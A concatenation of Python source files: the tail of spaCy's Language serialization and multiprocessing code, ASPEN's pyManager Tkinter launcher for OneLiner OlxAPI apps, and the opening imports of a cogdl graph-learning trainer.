docs = (Doc(self.vocab).from_bytes(byte_doc) for byte_doc in byte_docs)
try:
for i, (_, doc) in enumerate(zip(raw_texts, docs), 1):
yield doc
if i % batch_size == 0:
# tell `sender` that one batch was consumed.
sender.step()
finally:
for proc in procs:
proc.terminate()
def to_disk(self, path, exclude=tuple(), disable=None):
"""Save the current state to a directory. If a model is loaded, this
will include the model.
path (unicode or Path): Path to a directory, which will be created if
it doesn't exist.
exclude (list): Names of components or serialization fields to exclude.
DOCS: https://spacy.io/api/language#to_disk
"""
if disable is not None:
deprecation_warning(Warnings.W014)
exclude = disable
path = util.ensure_path(path)
serializers = OrderedDict()
serializers["tokenizer"] = lambda p: self.tokenizer.to_disk(
p, exclude=["vocab"]
)
serializers["meta.json"] = lambda p: p.open("w").write(
srsly.json_dumps(self.meta)
)
for name, proc in self.pipeline:
if not hasattr(proc, "name"):
continue
if name in exclude:
continue
if not hasattr(proc, "to_disk"):
continue
serializers[name] = lambda p, proc=proc: proc.to_disk(p, exclude=["vocab"])
serializers["vocab"] = lambda p: self.vocab.to_disk(p)
util.to_disk(path, serializers, exclude)
def from_disk(self, path, exclude=tuple(), disable=None):
"""Loads state from a directory. Modifies the object in place and
returns it. If the saved `Language` object contains a model, the
model will be loaded.
path (unicode or Path): A path to a directory.
exclude (list): Names of components or serialization fields to exclude.
RETURNS (Language): The modified `Language` object.
DOCS: https://spacy.io/api/language#from_disk
"""
if disable is not None:
deprecation_warning(Warnings.W014)
exclude = disable
path = util.ensure_path(path)
deserializers = OrderedDict()
deserializers["meta.json"] = lambda p: self.meta.update(srsly.read_json(p))
deserializers["vocab"] = lambda p: self.vocab.from_disk(
p
) and _fix_pretrained_vectors_name(self)
deserializers["tokenizer"] = lambda p: self.tokenizer.from_disk(
p, exclude=["vocab"]
)
for name, proc in self.pipeline:
if name in exclude:
continue
if not hasattr(proc, "from_disk"):
continue
deserializers[name] = lambda p, proc=proc: proc.from_disk(
p, exclude=["vocab"]
)
if not (path / "vocab").exists() and "vocab" not in exclude:
# Convert to list here in case exclude is (default) tuple
exclude = list(exclude) + ["vocab"]
util.from_disk(path, deserializers, exclude)
self._path = path
return self
def to_bytes(self, exclude=tuple(), disable=None, **kwargs):
"""Serialize the current state to a binary string.
exclude (list): Names of components or serialization fields to exclude.
RETURNS (bytes): The serialized form of the `Language` object.
DOCS: https://spacy.io/api/language#to_bytes
"""
if disable is not None:
deprecation_warning(Warnings.W014)
exclude = disable
serializers = OrderedDict()
serializers["vocab"] = lambda: self.vocab.to_bytes()
serializers["tokenizer"] = lambda: self.tokenizer.to_bytes(exclude=["vocab"])
serializers["meta.json"] = lambda: srsly.json_dumps(self.meta)
for name, proc in self.pipeline:
if name in exclude:
continue
if not hasattr(proc, "to_bytes"):
continue
serializers[name] = lambda proc=proc: proc.to_bytes(exclude=["vocab"])
exclude = util.get_serialization_exclude(serializers, exclude, kwargs)
return util.to_bytes(serializers, exclude)
def from_bytes(self, bytes_data, exclude=tuple(), disable=None, **kwargs):
"""Load state from a binary string.
bytes_data (bytes): The data to load from.
exclude (list): Names of components or serialization fields to exclude.
RETURNS (Language): The `Language` object.
DOCS: https://spacy.io/api/language#from_bytes
"""
if disable is not None:
deprecation_warning(Warnings.W014)
exclude = disable
deserializers = OrderedDict()
deserializers["meta.json"] = lambda b: self.meta.update(srsly.json_loads(b))
deserializers["vocab"] = lambda b: self.vocab.from_bytes(
b
) and _fix_pretrained_vectors_name(self)
deserializers["tokenizer"] = lambda b: self.tokenizer.from_bytes(
b, exclude=["vocab"]
)
for name, proc in self.pipeline:
if name in exclude:
continue
if not hasattr(proc, "from_bytes"):
continue
deserializers[name] = lambda b, proc=proc: proc.from_bytes(
b, exclude=["vocab"]
)
exclude = util.get_serialization_exclude(deserializers, exclude, kwargs)
util.from_bytes(bytes_data, deserializers, exclude)
return self
def _fix_pretrained_vectors_name(nlp):
# TODO: Replace this once we handle vectors consistently as static
# data
if "vectors" in nlp.meta and nlp.meta["vectors"].get("name"):
nlp.vocab.vectors.name = nlp.meta["vectors"]["name"]
elif not nlp.vocab.vectors.size:
nlp.vocab.vectors.name = None
elif "name" in nlp.meta and "lang" in nlp.meta:
vectors_name = "%s_%s.vectors" % (nlp.meta["lang"], nlp.meta["name"])
nlp.vocab.vectors.name = vectors_name
else:
raise ValueError(Errors.E092)
if nlp.vocab.vectors.size != 0:
link_vectors_to_models(nlp.vocab)
for name, proc in nlp.pipeline:
if not hasattr(proc, "cfg"):
continue
proc.cfg.setdefault("deprecation_fixes", {})
proc.cfg["deprecation_fixes"]["vectors_name"] = nlp.vocab.vectors.name
class DisabledPipes(list):
"""Manager for temporary pipeline disabling."""
def __init__(self, nlp, *names):
self.nlp = nlp
self.names = names
# Important! Not deep copy -- we just want the container (but we also
# want to support people providing arbitrarily typed nlp.pipeline
# objects.)
self.original_pipeline = copy(nlp.pipeline)
list.__init__(self)
self.extend(nlp.remove_pipe(name) for name in names)
def __enter__(self):
return self
def __exit__(self, *args):
self.restore()
def restore(self):
"""Restore the pipeline to its state when DisabledPipes was created."""
current, self.nlp.pipeline = self.nlp.pipeline, self.original_pipeline
unexpected = [name for name, pipe in current if not self.nlp.has_pipe(name)]
if unexpected:
# Don't change the pipeline if we're raising an error.
self.nlp.pipeline = current
raise ValueError(Errors.E008.format(names=unexpected))
self[:] = []
def _pipe(docs, proc, kwargs):
# We added some args for pipe that __call__ doesn't expect.
kwargs = dict(kwargs)
for arg in ["n_threads", "batch_size"]:
if arg in kwargs:
kwargs.pop(arg)
for doc in docs:
doc = proc(doc, **kwargs)
yield doc
def _apply_pipes(make_doc, pipes, reciever, sender):
"""Worker for Language.pipe
Args:
receiver (multiprocessing.Connection): Pipe to receive text. Usually created by `multiprocessing.Pipe()`
sender (multiprocessing.Connection): Pipe to send doc. Usually created by `multiprocessing.Pipe()`
"""
while True:
texts = reciever.get()
docs = (make_doc(text) for text in texts)
for pipe in pipes:
docs = pipe(docs)
# Connection does not accept unpickable objects, so send list.
sender.send([doc.to_bytes() for doc in docs])
class _Sender:
"""Util for sending data to multiprocessing workers in Language.pipe"""
def __init__(self, data, queues, chunk_size):
self.data = iter(data)
self.queues = iter(cycle(queues))
self.chunk_size = chunk_size
self.count = 0
def send(self):
"""Send chunk_size items from self.data to channels."""
for item, q in itertools.islice(
zip(self.data, cycle(self.queues)), self.chunk_size
):
# cycle channels so that distribute the texts evenly
q.put(item)
def step(self):
"""Tell sender that comsumed one item.
Data is sent to the workers after every chunk_size calls."""
self.count += 1
if self.count >= self.chunk_size:
self.count = 0
self.send()
|
pyManager.pyw
|
"""
OneLiner GUI tool for launching Python OlxAPI apps through the
OneLiner menu command Tools | OlxAPI App Laucher.
Note: Full file path of this Python program must be listed in OneLiner App manager
setting in the Tools | User-defined command | Setup dialog box
"""
__author__ = "ASPEN Inc."
__copyright__ = "Copyright 2021, Advanced System for Power Engineering Inc."
__license__ = "All rights reserved"
__category__ = "Common"
__pyManager__ = "no"
__email__ = "support@aspeninc.com"
__status__ = "Release"
__version__ = "1.2.2"
# IMPORT -----------------------------------------------------------------------
import logging
import sys,os
#
PATH_FILE,PY_FILE = os.path.split(os.path.abspath(__file__))
PATH_LIB = os.path.split(PATH_FILE)[0]
if PATH_LIB not in sys.path:
os.environ['PATH'] = PATH_LIB + ";" + os.environ['PATH']
sys.path.insert(0, PATH_LIB)
#
import time
import pathlib
import importlib.util
from AppUtils import *
#
chekPythonVersion(PY_FILE)
#
import tkinter as tk
import tkinter.filedialog as tkf
from tkinter import ttk
import re
#
# INPUTS cmdline ---------------------------------------------------------------
PARSER_INPUTS = iniInput(usage = "GUI for show and run python in a directory")
#
PARSER_INPUTS.add_argument('-fi' , help = '*(str) OLR file path' , default = '',type=str,metavar='')
PARSER_INPUTS.add_argument('-tpath',help = ' (str) Output folder for PowerScript command file', default = '',type=str,metavar='')
PARSER_INPUTS.add_argument('-pk' , help = ' (str) Selected object in the 1-Liner diagram', default = [],nargs='+',metavar='')
ARGVS = parseInput(PARSER_INPUTS)
#
ARGSR,NARGS,TARGS = None,[],{}
#
def chekPathIsNotWM(path):
if not os.path.isdir(path):
return False
#
pathSysStart = ["C:\\Intel","C:\\MSOCache","C:\\PerfLogs","C:\\Recovery","C:\\System Volume Information","C:\\Windows","C:\\SYSTEM","C:\\ProgramData","C:\Documents and Settings",\
"C:\\Program Files\\Microsoft","C:\\Program Files\\Windows","C:\\Program Files\\Intel","C:\\Program Files\\CodeMeter",\
"C:\\Program Files (x86)\\Microsoft","C:\\Program Files (x86)\\Windows","C:\\Program Files (x86)\\Intel","C:\\Program Files (x86)\\CodeMeter",\
"C:\\Users\\All Users\\Microsoft\\","C:\\Users\\All Users\\Package Cache\\","C:\\Users\\Public\\Roaming\\","C:\\Users\\All Users\\Windows"]
for p1 in pathSysStart:
if path.startswith(p1):
return False
#
pathSysIn = ["\\$RECYCLE.BIN"]
for p1 in pathSysIn:
if p1 in path:
return False
#
return True
#
def isPyFile(f1):
if os.path.isfile(f1) and (f1.upper().endswith(".PY") or f1.upper().endswith(".PYW")):
return True
return False
#
def checkPyManagerVisu(f1):
try:
a1 = read_File_text(f1)
except:
return False
for i in range(len(a1)):
if i>100:
return False
if a1[i].startswith("__pyManager__"):
try:
yn = a1[i].split("=")[1]
yn = yn.replace(" ","")
#
try:
yn = float(yn)
if yn>0:
return True
except:
yn1 = (yn[1:len(yn)-1]).upper()
if yn1 =="YES" or yn1 == 'TRUE' or yn=='True':
return True
except:
pass
return False
#
def getPyFileShow(alpy):
res = []
for p1 in alpy:
if checkPyManagerVisu(p1):
res.append(p1)
return res
#
def pathHavePy(path):
# not check .py in sub-folder
if not chekPathIsNotWM(path):
return False
#
try:
for p in os.listdir(path):
p1 = os.path.join(path,p)
if isPyFile(p1) or chekPathIsNotWM(p1):
return True
except:
pass
return False
#
def get_category(alpy):
res = []
for p1 in alpy:
a1 = read_File_text(p1)
c1 = 'Common'
for i in range(len(a1)):
if i>100:
break
s1 = str(a1[i]).replace(" ","")
if s1.startswith('__category__='):
as1 = s1.split('=')
c1 = as1[1]
c1 = str(c1.split('#')[0])
try:
c1 = c1[1:len(c1)-1]
except:
pass
break
res.append(c1)
return res
def corectOut(out):
res = out
idx1 = out.find('\nusage:')
if idx1>=0:
res = 'Description:' +out[idx1+6:]
#
res = res.replace('optional arguments:','Arguments: *(Required)')
res = res.replace(' -h, --help ','')
res = res.replace(' show this help message and exit','')
res = res.replace('-ut ','')
res = res.replace('(int) unit test [0-ignore, 1-unit test]','')
res = deleteLineBlank(res)
res = res.replace('Arguments: *(Required)','\nArguments: *(Required)')
return res
#
def getInputRequired(out):
res = []
an = out.split('\n')
test = False
for a1 in an:
if test:
a2 = a1.split()
try:
if a2[1].startswith('*'):
res.append(a2[0])
elif a2[1]=='[' and a2[2]=='...]' and a2[3].startswith('*'):
res.append(a2[0])
except:
pass
#
if a1.startswith('Arguments * Required,-h --help:'):
test = True
return res
#
def getAllPyFile(path,rer):
res = []
if not chekPathIsNotWM(path):
return res
try:
for p in os.listdir(path):
p1 = os.path.join(path,p)
if isPyFile(p1):
res.append(p1)
elif rer and os.path.isdir(p1):
for p2 in os.listdir(p1):
p3 = os.path.join(p1,p2)
if isPyFile(p3):
res.append(p3)
elif rer and os.path.isdir(p3):
r1 = getAllPyFile(p3,False)
res.extend(r1)
except:
pass
return res
#
class MainGUI(tk.Frame):
def __init__(self, master):
## master.attributes('-topmost', True)
self.splitter = tk.PanedWindow(master, orient=tk.HORIZONTAL)
self.master = master
sw = master.winfo_screenwidth()
sh = master.winfo_screenheight()
self.master.resizable(0,0)# fixed size
w = min(1000,sw)
h = min(650,sh)
master.geometry("{0}x{1}+{2}+{3}".format(w,h,int(sw/2-w/2),int(sh/2-h/2)))
master.wm_title("Python OlxAPI Apps")
## pathico = os.path.join(os.path.dirname(sys.executable) ,"DLLs")
## setIco(master,pathico,"pyc.ico")
setIco_1Liner(master)
remove_button(self.master)
self.currentPy = ""
self.nodeFavorite = []
self.nodeRecent = []
self.nodes = dict()
self.pathFile = dict()
#
self.reg1 = WIN_REGISTRY(path = "SOFTWARE\\ASPEN\\OneLiner\\PyManager\\recents" ,keyUser="",nmax =6)
self.reg2 = WIN_REGISTRY(path = "SOFTWARE\\ASPEN\\OneLiner\\PyManager\\dir" ,keyUser="",nmax =1)
self.reg3 = WIN_REGISTRY(path = "SOFTWARE\\ASPEN\\OneLiner\\PyManager\\favorites",keyUser="",nmax =20)
self.initGUI()
#
def initGUI(self):
# left-side
frame_left = tk.Frame(self.splitter)
self.tree = ttk.Treeview(frame_left, show='tree')
ysb1 = ttk.Scrollbar(frame_left, orient='vertical' , command=self.tree.yview)
xsb1 = ttk.Scrollbar(frame_left, orient='horizontal', command=self.tree.xview)
# left-side widget layout
self.tree.grid(row=0, column=0,padx=0,pady=0, sticky='NSEW')
ysb1.grid(row=0, column=1, sticky='ns')
xsb1.grid(row=1, column=0, sticky='ew')
# setup
self.tree.configure(yscrollcommand=lambda f, l:self.autoscroll(ysb1,f,l), xscrollcommand=lambda f, l:self.autoscroll(xsb1,f,l))
self.tree.configure(yscrollcommand=ysb1.set, xscrollcommand=xsb1.set)
self.tree.column("#0",minwidth=300, stretch=True)
#
frame_l1 = tk.Frame(frame_left)
frame_l1.grid(row=2, column=0,padx=0, pady=14)
#
self.bt_dir = tk.Button(frame_l1, text="Change directory",width = 27,command=self.open_dir)
frame_l11 = tk.Frame(frame_l1)
self.bt_add = tk.Button(frame_l11, text="Add favorite",width = 12,command=self.addFavorite)
self.bt_rmv = tk.Button(frame_l11, text="Remove favorite",width = 12,command=self.removeFavorite)
self.bt_dir.grid(row=0, column=1,padx=5,pady=5)
frame_l11.grid(row=1, column=1)
self.bt_add.grid(row=1, column=1,padx=5,pady=5)
self.bt_rmv.grid(row=1, column=3,padx=5,pady=5)
#--------------------------------------------------------------------------RIGHT
frame_right = tk.Frame(self.splitter)
frame_r1 = tk.Frame(frame_right)
frame_r1.grid(row=0, column=0,sticky='',pady=5,padx=5)#,
self.text1 = tk.Text(frame_r1,wrap = tk.NONE,width=500,height=22)#
# yScroll
ysb2 = ttk.Scrollbar(frame_r1, orient='vertical' , command=self.text1.yview)
xsb2 = ttk.Scrollbar(frame_r1, orient='horizontal', command=self.text1.xview)
ysb2.grid(row=1, column=1, sticky='ns')
xsb2.grid(row=2, column=0, sticky='ew')
self.text1.configure(yscrollcommand=lambda f, l:self.autoscroll(ysb2,f,l), xscrollcommand=lambda f, l:self.autoscroll(xsb2,f,l))
self.text1.configure(yscrollcommand=ysb2.set, xscrollcommand=xsb2.set)
self.text1.grid(row=1, column=0, sticky='ns')
frame_r1.columnconfigure(0, weight=1)
frame_r1.rowconfigure(0, weight=1)
frame_r1.pack(fill=tk.BOTH, expand=True)
# ----------------------------------------------------------------------------
frame_r2 = tk.Frame(frame_right)
#
arg = tk.Label(frame_r2, text="Arguments")
arg.grid(row=0, column=0, sticky='nw')
self.text2 = tk.Text(frame_r2,wrap = tk.NONE,width=500,height=8)
# yScroll
ysb3 = ttk.Scrollbar(frame_r2, orient='vertical' , command=self.text2.yview)
xsb3 = ttk.Scrollbar(frame_r2, orient='horizontal', command=self.text2.xview)
ysb3.grid(row=1, column=1, sticky='ns')
xsb3.grid(row=2, column=0, sticky='ew')
self.text2.configure(yscrollcommand=lambda f, l:self.autoscroll(ysb3,f,l), xscrollcommand=lambda f, l:self.autoscroll(xsb3,f,l))
self.text2.configure(yscrollcommand=ysb3.set, xscrollcommand=xsb3.set)
self.text2.grid(row=1, column=0, sticky='ns')
frame_r2.columnconfigure(0, weight=1)
frame_r2.rowconfigure(1, weight=1)
frame_r2.pack(fill=tk.BOTH, expand=True)
# ----------------------------------------------------------------------------
frame_r3 = tk.Frame(frame_right)
frame_r3.columnconfigure(1, weight=1)
frame_r3.rowconfigure(1, weight=1)
frame_r3.pack(fill=tk.BOTH,expand=True)
# button launch
self.bt_launch = tk.Button(frame_r3, text="Launch",width =12,command=self.launch)
self.bt_launch.grid(row=0, column=1,padx = 0,pady=0)
#
frame_r4 = tk.Frame(frame_right)
frame_r4.columnconfigure(1, weight=1)
frame_r4.rowconfigure(5, weight=1)
#
#button edit
self.bt_edit = tk.Button(frame_r4 , text = 'Edit in IDE',width =12,command=self.editPyIDE)
self.bt_edit.grid(row=1, column=0,padx = 20,pady=35)
#button exit
bt_exit = tk.Button(frame_r4 , text = 'Exit',width =12,command=self.exit)
bt_exit.grid(row=1, column=3,padx =0,pady=30)
#
self.bt_help = tk.Button(frame_r4 , text = 'Help',width =12,command=self.getHelp)
self.bt_help.grid(row=1, column=5,padx = 30,pady=30)
frame_r4.pack(fill=tk.BOTH,expand=True)
#
frame_left.columnconfigure(0, weight=1,minsize=210)
frame_left.rowconfigure(0, weight=1,minsize=210)
#
frame_right.columnconfigure(0, weight=1)
frame_right.rowconfigure(1, weight=1)
frame_right.pack(fill=tk.BOTH, expand=True)
#
# overall layout
self.splitter.add(frame_left)
self.splitter.add(frame_right)
self.splitter.pack(fill=tk.BOTH, expand=True)
#
self.dirPy = self.reg2.getValue0()
#
self.dirPy = os.path.abspath(self.dirPy)
self.reg2.appendValue(self.dirPy)
#
self.builderTree()
#
self.setSTButton('disabled')
#
def flush(self):
pass
#
def write(self, txt):
self.textc.insert(tk.INSERT,txt)
#
def clearConsol(self):
self.textc.delete(1.0,tk.END)
#
def getHelp(self):
gui_info("INFO","@To Add")
#
def resetTree(self):
x = self.tree.get_children()
for item in x: ## Changing all children from root item
self.tree.delete(item)
#
def builderTree(self):
self.insert_nodeFavorite('')
self.insert_nodeRecent('')
self.insert_node1('', self.dirPy, self.dirPy)
self.tree.bind('<<TreeviewSelect>>', self.open_node) # simple click
#
def autoscroll(self, sbar, first, last):
"""Hide and show scrollbar as needed."""
first, last = float(first), float(last)
if first <= 0 and last >= 1:
sbar.grid_remove()
else:
sbar.grid()
sbar.set(first, last)
#
def insert_node1(self, parent, text, abspath):
alpy = getAllPyFile(abspath,True)
alpy = getPyFileShow(alpy)
if len(alpy)==0:
node = self.tree.insert(parent, 'end', text=text, open=True)
self.pathFile[node] = abspath
node1 = self.tree.insert(node, 'end', text="None", open=True)
self.pathFile[node1] = abspath
return
categ = get_category(alpy)
categF = list(set(categ))
categF.sort(reverse=True)
#
node = self.tree.insert(parent, 'end', text=text, open=True)
self.pathFile[node] = abspath
for c1 in categF:
node1 = self.tree.insert(node, 'end', text=c1, open=True)
self.pathFile[node1] = abspath
for i in range(len(alpy)):
ci = categ[i]
p1 = alpy[i]
if ci==c1:
path1,py1 = os.path.split(os.path.abspath(p1))
nodei = self.tree.insert(node1, 'end', text=py1, open=False)
self.pathFile[nodei] = p1
#
def insert_node(self, parent, text, abspath):
hp1 = pathHavePy(abspath)
hp2 = isPyFile(abspath) and checkPyManagerVisu(abspath)
if hp1 or hp2 :
node = self.tree.insert(parent, 'end', text=text, open=False)
self.pathFile[node] = abspath
#
if hp1:
self.nodes[node] = abspath
self.tree.insert(node, 'end',open=False)
#
def insert_node0(self, parent, text, abspath):
node = self.tree.insert(parent, 'end', text=text, open=True)
self.pathFile[node] = abspath
#
if pathHavePy(abspath):
for p in os.listdir(abspath):
p1 = os.path.join(abspath, p)
if isPyFile(p1) and checkPyManagerVisu(p1):
node1 = self.tree.insert(node, 'end', text=p, open=False)
self.pathFile[node1] = p1
elif pathHavePy(p1):
self.insert_node(node, p, p1)
#
def insert_nodeRecent(self, node0):
if node0=='':
node = self.tree.insert('', 'end', text="Recent", open=True)
self.pathFile[node] = "Recent"
else:
node = node0
#
recent = self.reg1.getAllValue()
self.nodeRecent = [node]
#
for r1 in recent:
if isPyFile(r1) and checkPyManagerVisu(r1):
r1 = str(pathlib.Path(r1).resolve())
path1,py1 = os.path.split(os.path.abspath(r1))
node1 = self.tree.insert(node, 'end', text=py1, open=False)
self.pathFile[node1] = r1
self.nodeRecent.append(node1)
#
def insert_nodeFavorite(self, node0):
if node0=='':
node = self.tree.insert('', 'end', text="Favorite", open=True)
self.pathFile[node] = "Favorite"
else:
node = node0
#
fav = self.reg3.getAllValue()
self.nodeFavorite = [node]
#
for f1 in fav:
if isPyFile(f1) and checkPyManagerVisu(f1):
f1 = str(pathlib.Path(f1).resolve())
path1,py1 = os.path.split(os.path.abspath(f1))
node1 = self.tree.insert(node, 'end', text=py1, open=False)
self.pathFile[node1] = f1
self.nodeFavorite.append(node1)
#
def open_node(self, event):
node = self.tree.focus()
abspath = self.nodes.pop(node, None)
if abspath:#path
self.setSTButton('disabled')
self.tree.delete(self.tree.get_children(node))
if pathHavePy(abspath):
for p in os.listdir(abspath):
p1 = os.path.join(abspath, p)
self.insert_node(node, p, p1)
else:# File
v1 = self.pathFile[node]
if os.path.isfile(v1):
self.currentPy = os.path.abspath(v1)
self.text1.configure(state='normal')
self.setSTButton('active')
self.showPy()
#
if not node in self.nodeFavorite:
self.bt_rmv['state']='disabled'
#
else:
self.setSTButton('disabled')
#
def setSTButton(self,stt):
self.bt_add['state']=stt
self.bt_rmv['state']=stt
self.bt_launch['state']=stt
self.bt_edit['state']=stt
#
def exit1(self):
self.master.destroy()
#
def exit(self):
global ARGSR
ARGSR = None
self.master.destroy()
#
def open_dir(self):
"""Open a directory."""
self.dirPy = tkf.askdirectory()
if self.dirPy!="":
self.dirPy = os.path.abspath(self.dirPy)
#
self.resetTree()
self.builderTree()
self.reg2.appendValue(self.dirPy)
#
def addFavorite(self):
if self.reg3.appendValue(self.currentPy):
for i in range(1,len(self.nodeFavorite)):
self.tree.delete(self.nodeFavorite[i])
#
self.insert_nodeFavorite(self.nodeFavorite[0])
#
def updateRecents(self):
if self.reg1.appendValue(self.currentPy):
for i in range(1,len(self.nodeRecent)):
self.tree.delete(self.nodeRecent[i])
#
self.insert_nodeRecent(self.nodeRecent[0])
#
def removeFavorite(self):
self.reg3.deleteValue(self.currentPy)
for i in range(1,len(self.nodeFavorite)):
self.tree.delete(self.nodeFavorite[i])
#
self.insert_nodeFavorite(self.nodeFavorite[0])
#
def getVersion(self):
for i in range(len(self.currentPy_as)):
if self.currentPy_as[i].startswith("__version__"):
return self.currentPy_as[i]
if i>100:
break
return "__version__ = Unknown"
#
def showPy(self):
#
global NARGS,TARGS,IREQUIRED
IREQUIRED = []
try:
filehandle = open(self.currentPy, 'a' )
filehandle.close()
self.bt_edit['state']='active'
except IOError:
self.bt_edit['state']='disabled'
#
self.currentPy_as,se = read_File_text_0(self.currentPy)
self.text1.delete('1.0', tk.END)
self.text2.delete('1.0', tk.END)
self.text1.insert(tk.END, self.currentPy.replace('\\','/')+"\n")
self.text1.insert(tk.END, self.getVersion()+"\n")
#
o1 = None
if haveParseInput(self.currentPy_as):
out,err,returncode = runSubprocess_getHelp(self.currentPy)
if returncode!=0:
self.text1.insert(tk.END, err.strip())
return
o1 = out.replace(" ","")
#
if o1==None:
self.text1.insert(tk.END, se)
return
#
IREQUIRED = getInputRequired (out)
#
# out = corectOut(out)
self.text1.insert(tk.END, out)
self.text1.configure(state='disabled')
#
try:
path = os.path.dirname(self.currentPy)
if path not in sys.path:
os.environ['PATH'] = path + ";" + os.environ['PATH']
sys.path.insert(0, path)
#
spec = importlib.util.spec_from_file_location('', self.currentPy)
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
vala = module.ARGVS.__dict__
valb = dict(sorted(vala.items(), key=lambda item: item[0]))
#
NARGS = ['-h']
TARGS = {'-h':str}
for key, val in valb.items():
s1 = '-'+key
NARGS.append(s1)
TARGS[s1]= type(val)
if key not in ['ut']:
s1 +=' '
#
try:
val0 = ARGVS.__dict__[key]
except:
val0 = val
if type(val)==list:
for v1 in val0:
s1 += "\"" + v1 + "\"" + " "
else:
if type(val)==str :
s1 += "\"" + str(val0) + "\""
else:
s1 += str(val0)
#
s1 +="\n"
s1 = s1.replace('\\','/')
self.text2.insert(tk.END,s1)
except:
pass
#
def editPyIDE(self):
app = os.path.dirname(sys.executable)+"\\Lib\\idlelib\\idle.bat"
args = [app,self.currentPy]
runSubprocess_noWait(args) #run subprocess without waiting
#
def errorInputArgument(self,v1,se):
global ARGSR
ARGSR = None
sMain= se.ljust(30) +'\n'+ v1
gui_info(sTitle="ERROR Input Argument",sMain=sMain)
logging.error('\n'+sMain)
#
def launch(self):
global ARGSR,IREQUIRED
#
logging.info('run : '+self.currentPy)
#
pathe = os.path.dirname(sys.executable)
if (self.currentPy.upper()).endswith('.PYW'):
ARGSR = [os.path.join(pathe,'pythonw.exe')]
else:
ARGSR = [os.path.join(pathe,'python.exe')]
#
ARGSR.append(self.currentPy)
#
a1 = (self.text2.get(1.0, tk.END)).split("\n")
#
errInputRequired = []
demo1 = 0
#
for i in range(len(a1)):
v1 = (a1[i]).strip()
#
if v1!='':
k1 = str(v1).find(" ")
if k1>0:
u1 = v1[:k1]
u2 = v1[k1+1:]
else:
u1 = v1
u2 =''
#
if u1 not in NARGS:
self.errorInputArgument(v1,'Input not found:')
return
#
t1 = TARGS[u1]
u2 = u2.strip()
u2 = u2.strip('"')
u2 = u2.strip("'")
#
if u1=='-demo' and u2:
if u2 !='0':
demo1 = 1
#
if u1 in IREQUIRED and u2=='':
errInputRequired.append(v1)
#
if u2:
#
try:
if checkSpecialCharacter(u2):
self.errorInputArgument(v1,'Special Character found:')
return
except:
pass
#
try:
val = t1(u2)
except:
self.errorInputArgument(v1,'Type (' +str(t1.__name__) + ') not found:')
return
if t1!=list:
k2 = u2.find('"')
if k2>=0:
self.errorInputArgument(v1,'Error input:')
return
#
if u2:
ARGSR.append(u1)
ARGSR.append(u2)
else:
if u2:
ARGSR.append(u1)
#
ua = re.split(';|,|"',u2)
for ui in ua:
ui2 = ui.strip()
if ui2:
ARGSR.append(ui2)
#
if demo1==0 and errInputRequired:
sv1 = ''
for e1 in errInputRequired:
sv1 +=e1+'\n'
#
self.errorInputArgument(sv1,'* Required input missing')
return
#
self.updateRecents()
self.exit1()
#
def run(self):
self.frame_r4.grid_forget()
self.pgFrame.grid(row=0,column=0, padx=0, pady=0)
#
a1,r1 = self.bt_add['state'],self.bt_rmv['state']
self.stop_b['state']='active'
self.bt_add['state']='disabled'
self.bt_rmv['state']='disabled'
self.bt_dir['state']='disabled'
#
self.var1.set("Running")
self.progress['value'] = 0
self.text2.configure(state='disabled')
#
self.progress.start()
self.t = TraceThread(target=self.runPy)
self.t.start()
#BUTTON STATUS
self.text2.configure(state='normal')
self.bt_dir['state']='active'
self.bt_add['state']= a1
self.bt_rmv['state']= r1
def finish(self):
self.progress.stop()
self.pgFrame.grid_forget()
self.frame_r4.grid(row=0, column=0,sticky='',pady=5)
#
def stop_progressbar(self):
self.textc.insert(tk.INSERT,"Stop by user")
self.finish()
self.t.killed = True
#
def checkSpecialCharacter(s):
s1 = s.replace("\\",'')
b= str(s1.encode('utf8'))
b = b.replace("\\",'')
b = b[2:len(b)-1]
return b!=s1
#
def haveParseInput(ar1):
for i in range(len(ar1)):
a01 = ar1[i].replace(' ','')
if a01.startswith('ARGVS=AppUtils.parseInput(PARSER_INPUTS') or\
a01.startswith('ARGVS=parseInput(PARSER_INPUTS') or a01.startswith('PARSER_INPUTS.add_argument('):
return True
if i>200:
return False
return False
#
def createRunFile(tpath,args):
s = "import sys,os\n"
s += "PATH_FILE = os.path.split(os.path.abspath(__file__))[0]\n"
if os.path.isfile(os.path.join(PATH_FILE,'AppUtils.py')):
plb = PATH_FILE
else:
plb = PATH_LIB
plb = plb.replace('\\','/')
s += "PATH_LIB = "+ '"'+plb+'"\n'
#
s += 'os.environ["PATH"] = PATH_LIB + ";" + os.environ["PATH"]\n'
s += 'sys.path.insert(0, PATH_LIB)\n'
s += 'import AppUtils\n'
#
s += "command = ["
for a1 in args:
a1 = a1.replace('\\','/')
s+='"'+a1 + '"' +","
s = s[:len(s)-1]
s+=']\n'
s+= 'print("Run : "+command[1])\n'
s+= 'print()\n'
s+= '#\n'
s+='AppUtils.runCommand(command,PATH_FILE)\n'
#
sfile = os.path.join(tpath,'run.py')
saveString2File(sfile,s)
return sfile
#
def runFinal():
global ARGSR
if ARGSR!=None:
s1 = "\ncmd:\n"
for a1 in ARGSR:
s1 += '"'+a1 + '" '
#
logging.info(s1)
#
sfile = createRunFile(ARGVS.tpath,ARGSR)
argn = [ARGSR[0],sfile]
#
runSubprocess_noWait(argn)
else:
#cancel
logging.info('exit by user')
#
def main():
if ARGVS.tpath=='':
ARGVS.tpath = get_tpath()
#
FRUNNING,SRUNNING = openFile(ARGVS.tpath,'running')
#-----------------------------------
root = tk.Tk()
app = MainGUI(root)
root.mainloop()
#
runFinal()
#-----------------------------------
closeFile(FRUNNING)
deleteFile(SRUNNING)
#
if not isFile(ARGVS.tpath,'success'):
createFile(ARGVS.tpath,'cancel')
# "C:\\Program Files (x86)\\ASPEN\\Python38-32\\python.exe" "pyManager.pyw"
# "C:\\Program Files (x86)\\ASPEN\\Python38-32\\python.exe" pyManager.py -h
if __name__ == '__main__':
logger2File(PY_FILE)
main()
logging.shutdown()
|
trainer.py
|
import copy
import warnings
from typing import Optional
import numpy as np
from tqdm import tqdm
import os
import torch
import torch.distributed as dist
import torch.multiprocessing as mp
from torch.nn.parallel import DistributedDataParallel
from torch.cuda.amp import GradScaler, autocast
from cogdl.wrappers.data_wrapper.base_data_wrapper import DataWrapper
from cogdl.wrappers.model_wrapper.base_model_wrapper import ModelWrapper, EmbeddingModelWrapper
from cogdl.trainer.trainer_utils import evaluation_comp, load_model, save_model, ddp_end, ddp_after_epoch, Printer
from cogdl.trainer.embed_trainer import EmbeddingTrainer
from cogdl.trainer.controller import DataController
from cogdl.loggers import build_logger
from cogdl.data import Graph
def move_to_device(batch, device):
if isinstance(batch, list) or isinstance(batch, tuple):
